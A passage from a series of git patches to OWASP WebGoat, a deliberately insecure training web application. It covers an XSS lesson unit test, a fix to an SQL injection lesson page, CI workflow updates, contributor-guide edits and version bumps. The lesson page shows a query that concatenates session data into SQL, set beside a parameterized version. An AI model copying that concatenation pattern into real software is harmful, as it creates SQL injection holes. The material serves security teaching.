+ * Copyright (c) 2002 - 2021 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source
+ * ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webgoat.xss;
+
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
+import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
+import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
+
+import org.hamcrest.CoreMatchers;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.junit.jupiter.api.extension.ExtendWith;
+import org.mockito.junit.jupiter.MockitoExtension;
+import org.owasp.webgoat.assignments.AssignmentEndpointTest;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.test.web.servlet.MockMvc;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+
+/**
+ *
+ * @author Angel Olle Blazquez
+ *
+ */
+
+@ExtendWith(MockitoExtension.class)
+class CrossSiteScriptingLesson1Test extends AssignmentEndpointTest {
+
+    private static final String CONTEXT_PATH = "/CrossSiteScripting/attack1";
+
+    @Autowired
+    private MockMvc mockMvc;
+
+    @BeforeEach
+    public void setup() {
+        CrossSiteScriptingLesson1 crossSiteScriptingLesson1 = new CrossSiteScriptingLesson1();
+        init(crossSiteScriptingLesson1);
+        mockMvc = standaloneSetup(crossSiteScriptingLesson1).build();
+    }
+
+    @Test
+    void success() throws Exception {
+        mockMvc.perform(MockMvcRequestBuilders.post(CONTEXT_PATH)
+            .param("checkboxAttack1", "value"))
+            .andExpect(status().isOk())
+            .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
+    }
+
+    @Test
+    void failure() throws Exception {
+        mockMvc.perform(MockMvcRequestBuilders.post(CONTEXT_PATH))
+            .andExpect(status().isOk())
+            .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
+    }
+
+}

From a7b9954d0fa8aba37d2b72050f8971cdf10aa384 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 30 Sep 2021 16:53:43 +0200
Subject: [PATCH 048/227] 1101: fix quoting in statement

---
 .../lessonPlans/en/SqlInjection_content7.adoc | 21 +++++++++++--------
 1 file changed, 12 insertions(+), 9 deletions(-)

diff --git a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content7.adoc b/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content7.adoc
index 20a3e9045..371fcf0dc 100644
--- a/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content7.adoc
+++ b/webgoat-lessons/sql-injection/src/main/resources/lessonPlans/en/SqlInjection_content7.adoc
@@ -1,23 +1,26 @@
 == Immutable Queries
 
-These are the best defense against SQL injection.  They either do not have data that could get interpreted or they treat the data as a single entity that is bound to a column without interpretation.
+These are the best defense against SQL injection.  They either do not have data that could get interpreted, or they treat the data as a single entity that is bound to a column without interpretation.
 
 === Static Queries
--------------------------------------------------------
-SELECT * FROM products;
--------------------------------------------------------
 
--------------------------------------------------------
-SELECT * FROM users WHERE user = "'" + session.getAttribute("UserID") + "'";
--------------------------------------------------------
+----
+String query = "SELECT * FROM products";
+----
+
+----
+String query = "SELECT * FROM users WHERE user = '" + session.getAttribute("UserID") + "'";
+----
 
 === Parameterized Queries
--------------------------------------------------------
+
+----
 String query = "SELECT * FROM users WHERE last_name = ?";
 PreparedStatement statement = connection.prepareStatement(query);
 statement.setString(1, accountName);
 ResultSet results = statement.executeQuery();
--------------------------------------------------------
+----
 
 === Stored Procedures
+
 Only if stored procedure does not generate dynamic SQL

From b79a9c6b2c631f7d179907fc852efd5af8a874f7 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 30 Sep 2021 18:54:56 +0200
Subject: [PATCH 049/227] Build should use Java 16

---
 .github/workflows/branch_build.yml | 8 ++++----
 .github/workflows/pr_build.yml     | 2 +-
 2 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/.github/workflows/branch_build.yml b/.github/workflows/branch_build.yml
index 41dc36375..d45afdfa3 100644
--- a/.github/workflows/branch_build.yml
+++ b/.github/workflows/branch_build.yml
@@ -11,11 +11,11 @@ jobs:
     name: "Package and linting"
     steps:
       - uses: actions/checkout@v2
-      - name: set up JDK 15
+      - name: set up JDK 16
         uses: actions/setup-java@v2
         with:
           distribution: 'zulu'
-          java-version: 15
+          java-version: 16
           architecture: x64
       - name: Cache Maven packages
         uses: actions/cache@v2.1.5
@@ -36,11 +36,11 @@ jobs:
           - mvn -pl webgoat-integration-tests test
     steps:
       - uses: actions/checkout@v2
-      - name: set up JDK 15
+      - name: set up JDK 16
         uses: actions/setup-java@v2
         with:
           distribution: 'zulu'
-          java-version: 15
+          java-version: 16
           architecture: x64
       - name: Cache Maven packages
         uses: actions/cache@v2.1.5
diff --git a/.github/workflows/pr_build.yml b/.github/workflows/pr_build.yml
index 6584fe04f..e1b51e9e1 100644
--- a/.github/workflows/pr_build.yml
+++ b/.github/workflows/pr_build.yml
@@ -27,7 +27,7 @@ jobs:
     strategy:
       matrix:
         os: [ubuntu-latest, windows-latest, macos-latest]
-        java: [15]
+        java: [16]
     steps:
       - uses: actions/checkout@v2
       - name: Set up JDK ${{ matrix.java }}

From dc71975f27f5e7fa3a0729c8f085bd35ddb4f195 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 30 Sep 2021 18:57:01 +0200
Subject: [PATCH 050/227] No need to do `mvn clean`

---
 .github/workflows/branch_build.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/.github/workflows/branch_build.yml b/.github/workflows/branch_build.yml
index d45afdfa3..eac995619 100644
--- a/.github/workflows/branch_build.yml
+++ b/.github/workflows/branch_build.yml
@@ -24,7 +24,7 @@ jobs:
           key: ubuntu-latest-m2-${{ hashFiles('**/pom.xml') }}
           restore-keys: ubuntu-latest-m2
       - name: Test with Maven
-        run: mvn clean install -DskipTests
+        run: mvn install -DskipTests
 
   testing:
     needs: install-notest

From 9e15e9500118888b9e7a41b820de0f72e897ffef Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Thu, 30 Sep 2021 19:01:45 +0200
Subject: [PATCH 051/227] Remove `signoff` action as it will not work with
 forked repositories

---
 .github/workflows/signoff_mr.yml | 47 --------------------------------
 1 file changed, 47 deletions(-)
 delete mode 100644 .github/workflows/signoff_mr.yml

diff --git a/.github/workflows/signoff_mr.yml b/.github/workflows/signoff_mr.yml
deleted file mode 100644
index 5838fd79c..000000000
--- a/.github/workflows/signoff_mr.yml
+++ /dev/null
@@ -1,47 +0,0 @@
-on: issue_comment
-
-jobs:
-  build:
-    runs-on: ubuntu-latest
-    steps:
-      - uses: actions/github-script@v5
-        if: github.event.action == 'created'
-        with:
-          github-token: ${{ secrets.GITHUB_TOKEN }}
-          script: |
-            const isValidSignOff = (
-              context.payload.action === 'created' &&
-              context.payload.issue.pull_request &&
-              context.payload.comment.user.id === context.payload.issue.user.id &&
-              context.payload.comment.body === '/signoff'
-            )
-            if (!isValidSignOff) return
-            const pr = await github.pulls.get({
-              ...context.repo,
-              pull_number: context.payload.issue.number
-            })
-            const commits = await github.pulls.listCommits({
-              ...context.repo,
-              pull_number: context.payload.issue.number
-            })
-            const baseCommit = await github.git.getCommit({
-              ...context.repo,
-              commit_sha: pr.data.head.sha
-            })
-            const tree = await github.git.getTree({
-              ...context.repo,
-              tree_sha: baseCommit.data.tree.sha
-            })
-            const commitLines = commits.data.map(item => `- ${item.sha.slice(0, 6)}: ${item.commit.message}`).join('\n')
-            const header = `I, @${context.payload.comment.user.login}, hereby signoff on these commits:`
-            const newCommit = await github.git.createCommit({
-              ...context.repo,
-              message: `${header}\n\n${commitLines}`,
-              tree: tree.data.sha,
-              parents: [pr.data.head.sha]
-            })
-            await github.git.updateRef({
-              ...context.repo,
-              ref: `heads/${pr.data.head.ref}`,
-              sha: newCommit.data.sha
-            })
\ No newline at end of file

From 4b32cc36a7904d78fc05e5da5e3512be57a8041a Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sat, 2 Oct 2021 19:04:00 +0200
Subject: [PATCH 052/227] Remove sign off.

CLA assistant is structurally broken, let's keep it simple and not enforce signing off etc. There should be no barrier to get help from the community.
---
 CONTRIBUTING.md          | 33 ++++++++++-----------------------
 PULL_REQUEST_TEMPLATE.md |  8 +-------
 2 files changed, 11 insertions(+), 30 deletions(-)

diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md
index b478ac14d..e1e172452 100644
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -16,19 +16,18 @@ This document describes how you can contribute to WebGoat. Please read it carefu
 There are a couple of ways on how you can contribute to the project:
 
 * **File [issues](https://github.com/WebGoat/WebGoat/issues "Webgoat Issues")** for missing content or errors. Explain what you think is missing and give a suggestion as to where it could be added.
-* **Create a [Pull Request (PR)](https://github.com/WebGoat/WebGoat/pulls "Create a pull request")**. This is a direct contribution to the project and may be merged after review. You should ideally [create an issue](https://github.com/WebGoat/WebGoat/issues "WebGoat Issues") for any PR you would like to submit, as we can first review the merit of the PR and avoid any unnecessary work. This is of course not needed for small modifications such as correcting typos.
+* **Create a [pull request (PR)](https://github.com/WebGoat/WebGoat/pulls "Create a pull request")**. This is a direct contribution to the project and may be merged after review. You should ideally [create an issue](https://github.com/WebGoat/WebGoat/issues "WebGoat Issues") for any PR you would like to submit, as we can first review the merit of the PR and avoid any unnecessary work. This is of course not needed for small modifications such as correcting typos.
 * **Help out financially** by donating via [OWASP donations](https://owasp.org/donate/?reponame=www-project-webgoat&title=OWASP+WebGoat).
 
-## How to get your PR Accepted
+## How to get your PR accepted
 
-Your PR is valuable to us. And to make sure we can integrate it smoothly, we have a few items for you to consider. In short:
+Your PR is valuable to us, and to make sure we can integrate it smoothly, we have a few items for you to consider. In short:
 The minimum requirements for code contributions are:
 
 1. The code _must_ be compliant with the configured Checkstyle and PMD rules.
 2. All new and changed code _should_ have a corresponding unit and/or integration test.
 3. New and changed lessons _must_ have a corresponding integration test.
 4. [Status checks](https://docs.github.com/en/github/collaborating-with-pull-requests/collaborating-on-repositories-with-code-quality-features/about-status-checks) should pass for your last commit.
-5. All Git commits within a PR _must_ be [signed off](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s) or [`/signoff` is provided as a comment](https://github.com/JasonEtco/signoff-commit-action) to indicate the contributor's agreement with the [Developer Certificate of Origin](https://developercertificate.org/). Alternatively you commit one signoff commit at the end of your commits by means of `git commit -m "Sign off" --amend --signof`.
 
 Additionally, the following guidelines can help:
 
@@ -39,26 +38,14 @@ Pull requests should be as small/atomic as possible. Large, wide-sweeping change
 * If you are making spelling corrections in the docs, don't modify other files.
 * If you are adding new functions don't '*cleanup*' unrelated functions. That cleanup belongs in another pull request.
 
-### Don't mix code changes with whitespace cleanup
-
-If you change two lines of code and correct 200 lines of whitespace issues in a file the diff on that pull request is functionally unreadable and will be **rejected**. Whitespace cleanups need to be in their own pull request.
-
-### Keep your code simple!
-
-Please keep your code as clean and straightforward as possible.
-Furthermore, the pixel shortage is over. We want to see:
-
-* `opacity` instead of `o`
-* `placeholder` instead of `ph`
-* `myFunctionThatDoesThings()` instead of `mftdt()`
 
 ### Write a good commit message
 
-* Explain why you make the changes. [More infos about a good commit message.][commit_message]
+* Explain why you make the changes. [More infos about a good commit message.](https://betterprogramming.pub/stop-writing-bad-commit-messages-8df79517177d)
 
-* If you fix an issue with your commit, please close the issue by [adding one of the keywords and the issue number][closing-issues-via-commit-messages] to your commit message.
+* If you fix an issue with your commit, please close the issue by [adding one of the keywords and the issue number](https://docs.github.com/en/issues/tracking-your-work-with-issues/linking-a-pull-request-to-an-issue) to your commit message.
 
-  For example: `Fix #545`
+  For example: `Fix #545` or `Closes #10`
 
 ## How to set up your Contributor Environment
 
@@ -84,8 +71,8 @@ Furthermore, the pixel shortage is over. We want to see:
     See also the GitHub documentation on "[Configuring a remote for a fork](https://docs.github.com/en/free-pro-team@latest/github/collaborating-with-issues-and-pull-requests/configuring-a-remote-for-a-fork "Configuring a remote for a fork")".
 5. Choose what to work on, based on any of the outstanding [issues](https://github.com/WebGoat/WebGoat/issues "WebGoat Issues").
 6. Create a branch so that you can cleanly work on the chosen issue: `git checkout -b FixingIssue66`
-7. Open your favorite editor and start making modifications. We recommend using the IntelliJ Idea <TODO : LINK HERE>.
-8. After your modifications are done, push them to your forked repository. This can be done by executing the command `git add MYFILE` for every file you have modified, followed by `git commit -m '<issue-number>:Your Commit Message'` to commit the modifications and `git push` to push your modifications to GitHub.
+7. Open your favorite editor and start making modifications. We recommend using the [IntelliJ Idea](https://www.jetbrains.com/idea/).
+8. After your modifications are done, push them to your forked repository. This can be done by executing the command `git add MYFILE` for every file you have modified, followed by `git commit -m 'your commit message here'` to commit the modifications and `git push` to push your modifications to GitHub.
 9. Create a Pull Request (PR) by going to your fork, <https://github.com/Your_Github_Handle/WebGoat> and click on the "New Pull Request" button. The target branch should typically be the Master branch. When submitting a PR, be sure to follow the checklist that is provided in the PR template. The checklist itself will be filled out by the reviewer.
 10. Your PR will be reviewed and comments may be given. In order to process a comment, simply make modifications to the same branch as before and push them to your repository. GitHub will automatically detect these changes and add them to your existing PR.
 11. When starting on a new PR in the future, make sure to always keep your local repo up to date:
@@ -105,7 +92,7 @@ If at any time you want to work on a different issue, you can simply switch to a
 
 Although we greatly appreciate any and all contributions to the project, there are a few things that you should take into consideration:
 
-* The WebGoat project should not be used as a platform for advertisement of commercial tools, companies or individuals. Write-ups should be written with free and open-source tools in mind and commercial tools are typically not accepted, unless as a reference in the security tools section.
+* The WebGoat project should not be used as a platform for advertisement for commercial tools, companies or individuals. Write-ups should be written with free and open-source tools in mind and commercial tools are typically not accepted, unless as a reference in the security tools section.
 * Unnecessary self-promotion of tools or blog posts is frowned upon. If you have a relation with on of the URLs or tools you are referencing, please state so in the PR so that we can verify that the reference is in line with the rest of the guide.
 
-Please be sure to take a careful look at our [Code of Conduct](https://github.com/WebGoat/WebGoat/blob/master/CODE_OF_CONDUCT.md "Code of Conduct") for all the details.
+Please be sure to take a careful look at our [Code of Conduct](https://github.com/WebGoat/WebGoat/blob/master/CODE_OF_CONDUCT.md) for all the details.
diff --git a/PULL_REQUEST_TEMPLATE.md b/PULL_REQUEST_TEMPLATE.md
index 0f4d52c1a..8a74ce118 100644
--- a/PULL_REQUEST_TEMPLATE.md
+++ b/PULL_REQUEST_TEMPLATE.md
@@ -1,7 +1 @@
-Thank you for submitting a Pull Request to the WebGoat. Please make sure that:
-
-- [ ] Status checks have passed (e.g. packaging, linting, testing are fine)
-- [ ] Commits are [signed off](https://git-scm.com/docs/git-commit#Documentation/git-commit.txt--s) or you have a commit which you amend with `git commit -m "Sign off" --amend --signof`. See [Contributing.md](https://github.com/WebGoat/WebGoat/blob/develop/CONTRIBUTING.md) for more details.
-
-If your PR is related to an issue. Please end your PR test with the following line:
-This PR closes #< insert number here >.
\ No newline at end of file
+Thank you for submitting a pull request to the WebGoat!
\ No newline at end of file

From ccdede647bcd69838bc0bf105d064b9d17861260 Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen <jwillemsen@xebia.com>
Date: Sun, 3 Oct 2021 08:45:33 +0200
Subject: [PATCH 053/227] Sign off

Signed-off-by: Jeroen Willemsen <jwillemsen@xebia.com>
---
 README.MD | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.MD b/README.MD
index 1e83478ef..8086bb37d 100644
--- a/README.MD
+++ b/README.MD
@@ -1,6 +1,6 @@
 # WebGoat 8: A deliberately insecure Web Application
 
-[![Build](https://github.com/WebGoat/WebGoat/actions/workflows/build.yml/badge.svg)](https://github.com/WebGoat/WebGoat/actions/workflows/build.yml)
+[![Pull request build](https://github.com/WebGoat/WebGoat/actions/workflows/pr_build.yml/badge.svg?branch=develop)](https://github.com/WebGoat/WebGoat/actions/workflows/pr_build.yml)
 [![Coverage Status](https://coveralls.io/repos/WebGoat/WebGoat/badge.svg?branch=develop&service=github)](https://coveralls.io/github/WebGoat/WebGoat?branch=master)
 [![Codacy Badge](https://api.codacy.com/project/badge/b69ee3a86e3b4afcaf993f210fccfb1d)](https://www.codacy.com/app/dm/WebGoat)
 [![java-jdk](https://img.shields.io/badge/java%20jdk-16-green.svg)](https://jdk.java.net/)

From ff67ee64842835acf28c6cbf78c6c47a1c281b32 Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 4 Oct 2021 14:40:19 +0200
Subject: [PATCH 054/227] Update to correct version

---
 docker/pom.xml                                   | 2 +-
 pom.xml                                          | 2 +-
 webgoat-container/pom.xml                        | 2 +-
 webgoat-integration-tests/pom.xml                | 2 +-
 webgoat-lessons/auth-bypass/pom.xml              | 2 +-
 webgoat-lessons/bypass-restrictions/pom.xml      | 2 +-
 webgoat-lessons/challenge/pom.xml                | 2 +-
 webgoat-lessons/chrome-dev-tools/pom.xml         | 2 +-
 webgoat-lessons/cia/pom.xml                      | 2 +-
 webgoat-lessons/client-side-filtering/pom.xml    | 2 +-
 webgoat-lessons/cross-site-scripting/pom.xml     | 2 +-
 webgoat-lessons/crypto/pom.xml                   | 2 +-
 webgoat-lessons/csrf/pom.xml                     | 2 +-
 webgoat-lessons/html-tampering/pom.xml           | 2 +-
 webgoat-lessons/http-basics/pom.xml              | 2 +-
 webgoat-lessons/http-proxies/pom.xml             | 2 +-
 webgoat-lessons/idor/pom.xml                     | 2 +-
 webgoat-lessons/insecure-deserialization/pom.xml | 2 +-
 webgoat-lessons/insecure-login/pom.xml           | 2 +-
 webgoat-lessons/jwt/pom.xml                      | 2 +-
 webgoat-lessons/missing-function-ac/pom.xml      | 2 +-
 webgoat-lessons/password-reset/pom.xml           | 2 +-
 webgoat-lessons/path-traversal/pom.xml           | 2 +-
 webgoat-lessons/pom.xml                          | 4 ++--
 webgoat-lessons/secure-passwords/pom.xml         | 2 +-
 webgoat-lessons/spoof-cookie/pom.xml             | 2 +-
 webgoat-lessons/sql-injection/pom.xml            | 2 +-
 webgoat-lessons/ssrf/pom.xml                     | 2 +-
 webgoat-lessons/vulnerable-components/pom.xml    | 2 +-
 webgoat-lessons/webgoat-introduction/pom.xml     | 2 +-
 webgoat-lessons/webgoat-lesson-template/pom.xml  | 2 +-
 webgoat-lessons/webwolf-introduction/pom.xml     | 2 +-
 webgoat-lessons/xxe/pom.xml                      | 2 +-
 webgoat-server/pom.xml                           | 2 +-
 webwolf/pom.xml                                  | 2 +-
 35 files changed, 36 insertions(+), 36 deletions(-)

diff --git a/docker/pom.xml b/docker/pom.xml
index 0a245d64a..8bb17f6a3 100644
--- a/docker/pom.xml
+++ b/docker/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat</groupId>
         <artifactId>webgoat-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
     <dependencies>
diff --git a/pom.xml b/pom.xml
index 900d9dbab..f0923b89a 100644
--- a/pom.xml
+++ b/pom.xml
@@ -6,7 +6,7 @@
     <groupId>org.owasp.webgoat</groupId>
     <artifactId>webgoat-parent</artifactId>
     <packaging>pom</packaging>
-    <version>8.2.1-SNAPSHOT</version>
+    <version>8.2.3-SNAPSHOT</version>
 
     <parent>
         <groupId>org.springframework.boot</groupId>
diff --git a/webgoat-container/pom.xml b/webgoat-container/pom.xml
index 25cd764a3..b6cdb2928 100644
--- a/webgoat-container/pom.xml
+++ b/webgoat-container/pom.xml
@@ -9,7 +9,7 @@
     <parent>
         <groupId>org.owasp.webgoat</groupId>
         <artifactId>webgoat-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
     <build>
diff --git a/webgoat-integration-tests/pom.xml b/webgoat-integration-tests/pom.xml
index ff665b923..9ef25459e 100644
--- a/webgoat-integration-tests/pom.xml
+++ b/webgoat-integration-tests/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat</groupId>
         <artifactId>webgoat-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
     <dependencies>
diff --git a/webgoat-lessons/auth-bypass/pom.xml b/webgoat-lessons/auth-bypass/pom.xml
index 6cefc9d83..cdc98514d 100644
--- a/webgoat-lessons/auth-bypass/pom.xml
+++ b/webgoat-lessons/auth-bypass/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
 </project>
diff --git a/webgoat-lessons/bypass-restrictions/pom.xml b/webgoat-lessons/bypass-restrictions/pom.xml
index 4ed518cf6..cd0ec4cdd 100755
--- a/webgoat-lessons/bypass-restrictions/pom.xml
+++ b/webgoat-lessons/bypass-restrictions/pom.xml
@@ -6,6 +6,6 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 </project>
diff --git a/webgoat-lessons/challenge/pom.xml b/webgoat-lessons/challenge/pom.xml
index 52c5ff7d9..dc788907d 100644
--- a/webgoat-lessons/challenge/pom.xml
+++ b/webgoat-lessons/challenge/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
 
diff --git a/webgoat-lessons/chrome-dev-tools/pom.xml b/webgoat-lessons/chrome-dev-tools/pom.xml
index 4ced9f0ee..fdb4e9726 100644
--- a/webgoat-lessons/chrome-dev-tools/pom.xml
+++ b/webgoat-lessons/chrome-dev-tools/pom.xml
@@ -6,6 +6,6 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 </project>
\ No newline at end of file
diff --git a/webgoat-lessons/cia/pom.xml b/webgoat-lessons/cia/pom.xml
index 8362fb105..68f02549f 100644
--- a/webgoat-lessons/cia/pom.xml
+++ b/webgoat-lessons/cia/pom.xml
@@ -6,6 +6,6 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 </project>
\ No newline at end of file
diff --git a/webgoat-lessons/client-side-filtering/pom.xml b/webgoat-lessons/client-side-filtering/pom.xml
index e92517422..78bb41d25 100644
--- a/webgoat-lessons/client-side-filtering/pom.xml
+++ b/webgoat-lessons/client-side-filtering/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
 </project>
diff --git a/webgoat-lessons/cross-site-scripting/pom.xml b/webgoat-lessons/cross-site-scripting/pom.xml
index 5bb02a9f2..9bb6163e1 100644
--- a/webgoat-lessons/cross-site-scripting/pom.xml
+++ b/webgoat-lessons/cross-site-scripting/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
     <dependencies>
         <dependency>
diff --git a/webgoat-lessons/crypto/pom.xml b/webgoat-lessons/crypto/pom.xml
index 0b5b99d70..87c6cd064 100644
--- a/webgoat-lessons/crypto/pom.xml
+++ b/webgoat-lessons/crypto/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
 </project>
diff --git a/webgoat-lessons/csrf/pom.xml b/webgoat-lessons/csrf/pom.xml
index 940662434..cf0cd930d 100644
--- a/webgoat-lessons/csrf/pom.xml
+++ b/webgoat-lessons/csrf/pom.xml
@@ -6,6 +6,6 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 </project>
\ No newline at end of file
diff --git a/webgoat-lessons/html-tampering/pom.xml b/webgoat-lessons/html-tampering/pom.xml
index 702e6665a..ab3516c57 100755
--- a/webgoat-lessons/html-tampering/pom.xml
+++ b/webgoat-lessons/html-tampering/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
     <dependencies>
diff --git a/webgoat-lessons/http-basics/pom.xml b/webgoat-lessons/http-basics/pom.xml
index 8af8630ab..4448eebfd 100644
--- a/webgoat-lessons/http-basics/pom.xml
+++ b/webgoat-lessons/http-basics/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
 </project>
diff --git a/webgoat-lessons/http-proxies/pom.xml b/webgoat-lessons/http-proxies/pom.xml
index bfefc4372..6e66fab3e 100644
--- a/webgoat-lessons/http-proxies/pom.xml
+++ b/webgoat-lessons/http-proxies/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
     <dependencies>
diff --git a/webgoat-lessons/idor/pom.xml b/webgoat-lessons/idor/pom.xml
index 3e9feb2fe..108e3ceae 100644
--- a/webgoat-lessons/idor/pom.xml
+++ b/webgoat-lessons/idor/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
 </project>
\ No newline at end of file
diff --git a/webgoat-lessons/insecure-deserialization/pom.xml b/webgoat-lessons/insecure-deserialization/pom.xml
index 598f857f5..85a2499b1 100755
--- a/webgoat-lessons/insecure-deserialization/pom.xml
+++ b/webgoat-lessons/insecure-deserialization/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
     <dependencies>
diff --git a/webgoat-lessons/insecure-login/pom.xml b/webgoat-lessons/insecure-login/pom.xml
index 4104c69ac..1c382d4c0 100755
--- a/webgoat-lessons/insecure-login/pom.xml
+++ b/webgoat-lessons/insecure-login/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
     <dependencies>
diff --git a/webgoat-lessons/jwt/pom.xml b/webgoat-lessons/jwt/pom.xml
index 005f80c74..535484960 100644
--- a/webgoat-lessons/jwt/pom.xml
+++ b/webgoat-lessons/jwt/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
     <dependencies>
diff --git a/webgoat-lessons/missing-function-ac/pom.xml b/webgoat-lessons/missing-function-ac/pom.xml
index 2d6a3129e..824944762 100644
--- a/webgoat-lessons/missing-function-ac/pom.xml
+++ b/webgoat-lessons/missing-function-ac/pom.xml
@@ -6,7 +6,7 @@
     <parent>
         <groupId>org.owasp.webgoat.lesson</groupId>
         <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.1-SNAPSHOT</version>
+        <version>8.2.3-SNAPSHOT</version>
     </parent>
 
 </project>
diff --git a/webgoat-lessons/password-reset/pom.xml b/webgoat-lessons/password-reset/pom.xml
index 29191c201..fd0b2cec9 100644
